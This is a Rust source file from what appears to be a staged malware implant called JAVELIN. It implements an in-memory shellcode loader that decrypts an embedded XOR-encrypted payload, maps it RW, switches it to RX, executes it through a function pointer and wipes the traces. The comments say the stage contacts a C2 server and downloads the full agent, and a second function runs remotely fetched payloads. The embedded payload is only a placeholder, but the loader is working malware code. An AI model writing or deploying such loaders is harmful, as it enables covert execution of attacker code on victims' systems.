//! Stage 3 loader - Loads and executes Stage0 (the bootstrap payload)
//!
//! This is the core functionality of JAVELIN

use crate::crypto::{decrypt_payload, CryptoAlgorithm};
use crate::memory::{allocate_rw, cleanup_memory, transition_rx};
use std::error::Error;

/// Embedded Stage 3 (Stage0) payload - encrypted
///
/// This is the bootstrap payload that will:
/// - Contact the C2 server
/// - Perform key exchange
/// - Download the full agent
///
/// Generated by the builder and embedded at compile time
const ENCRYPTED_STAGE0: &[u8] = &[
    // Placeholder - will be replaced by builder
    0x00,
];

/// XOR key for Stage0 decryption
/// Generated randomly for each build
const STAGE0_XOR_KEY: &[u8] = b"PLACEHOLDER_KEY_32_BYTES_RANDOM!";

/// Loads and executes Stage 3 (Stage0)
///
/// **Execution flow**:
/// 1. Decrypt Stage0 payload
/// 2. Allocate RW memory
/// 3. Copy payload to memory
/// 4. Transition memory to RX
/// 5. Execute Stage0
/// 6. Clean up artifacts
///
/// # Returns
///
/// * `Ok(())` - Stage0 executed successfully
/// * `Err(_)` - Failed to load or execute Stage0
pub fn load_stage3() -> Result<(), Box<dyn Error>> {
    #[cfg(feature = "dev")]
    println!("[JAVELIN] Loading Stage 3 (Stage0)...");

    // Check if we have a payload
    if ENCRYPTED_STAGE0.len() <= 1 {
        return Err("No Stage0 payload embedded".into());
    }

    // Step 1: Decrypt Stage0
    #[cfg(feature = "dev")]
    println!("[JAVELIN] Decrypting Stage0 ({} bytes)", ENCRYPTED_STAGE0.len());
    
    let decrypted = decrypt_payload(ENCRYPTED_STAGE0, STAGE0_XOR_KEY, CryptoAlgorithm::Xor)?;

    // Step 2: Allocate RW memory
    #[cfg(feature = "dev")]
    println!("[JAVELIN] Allocating {} bytes as RW", decrypted.len());
    
    let region = allocate_rw(decrypted.len())?;

    // Step 3: Copy payload to memory
    #[cfg(feature = "dev")]
    println!("[JAVELIN] Copying payload to memory");
    
    unsafe {
        std::ptr::copy_nonoverlapping(
            decrypted.as_ptr(),
            region.address(),
            decrypted.len(),
        );
    }

    // Step 4: Transition to RX
    #[cfg(feature = "dev")]
    println!("[JAVELIN] Transitioning memory to RX");
    
    transition_rx(&region)?;

    // Step 5: Execute Stage0
    #[cfg(feature = "dev")]
    println!("[JAVELIN] Executing Stage0");
    
    unsafe {
        // Cast memory to function pointer
        // Stage0 is expected to be position-independent code
        let stage0_entry: extern "C" fn() = std::mem::transmute(region.address());
        stage0_entry();
    }

    // Step 6: Cleanup
    #[cfg(feature = "dev")]
    println!("[JAVELIN] Cleaning up memory");
    
    cleanup_memory(&region);

    #[cfg(feature = "dev")]
    println!("[JAVELIN] Stage0 execution complete");

    Ok(())
}

/// Alternative loader that accepts Stage0 as a parameter
///
/// Useful for download-based staging where Stage0 is fetched remotely
///
/// # Arguments
///
/// * `encrypted_payload` - The encrypted Stage0 payload
/// * `key` - Decryption key
/// * `algorithm` - Decryption algorithm to use
///
/// # Returns
///
/// * `Ok(())` - Stage0 executed successfully
/// * `Err(_)` - Failed to load or execute Stage0
pub fn load_stage3_from_bytes(
    encrypted_payload: &[u8],
    key: &[u8],
    algorithm: CryptoAlgorithm,
) -> Result<(), Box<dyn Error>> {
    #[cfg(feature = "dev")]
    println!("[JAVELIN] Loading Stage3 from provided bytes");

    // Decrypt
    let decrypted = decrypt_payload(encrypted_payload, key, algorithm)?;

    // Allocate and execute (same as embedded version)
    let region = allocate_rw(decrypted.len())?;

    unsafe {
        std::ptr::copy_nonoverlapping(decrypted.as_ptr(), region.address(), decrypted.len());
    }

    transition_rx(&region)?;

    unsafe {
        let stage0_entry: extern "C" fn() = std::mem::transmute(region.address());
        stage0_entry();
    }

    cleanup_memory(&region);

    Ok(())
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn test_load_with_empty_payload() {
        // Should fail gracefully when no payload is embedded
        let result = load_stage3();
        assert!(result.is_err());
        
        if let Err(e) = result {
            assert!(e.to_string().contains("No Stage0 payload"));
        }
    }
}
